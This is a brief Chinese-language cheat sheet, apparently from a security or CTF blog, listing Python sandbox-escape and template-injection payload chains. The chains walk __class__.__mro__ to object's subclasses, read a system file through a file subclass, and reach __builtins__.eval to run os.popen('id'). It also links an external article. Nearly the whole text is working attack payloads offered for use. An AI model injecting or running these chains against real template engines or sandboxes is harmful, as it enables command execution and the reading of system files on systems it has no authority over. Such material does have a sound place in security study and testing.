1,常用命令
().__class__ 当前类 ().__class__.__mro__ 当前类继承了哪些类 ().__class__.__mro__[-1].__subclasses__() object类的所有子类,具体就可以利用这个来找自己所需的类比如有时第40为file函数,就可以通过
''.__class__.__mro__[-1].__subclasses__()[40]("/etc/password").read() 来进行读取文件内容 ''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__.__builtins__ 查看子类列表中第59个这个下面的内置函数,找到所需的 ''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__.__builtins__.eval("__import__('os').popen('id').read()") 找到合适的函数后,可以利用如上所示来进行利用更多可以参考:
https://www.cnblogs.com/vstar-o/p/13719889.html
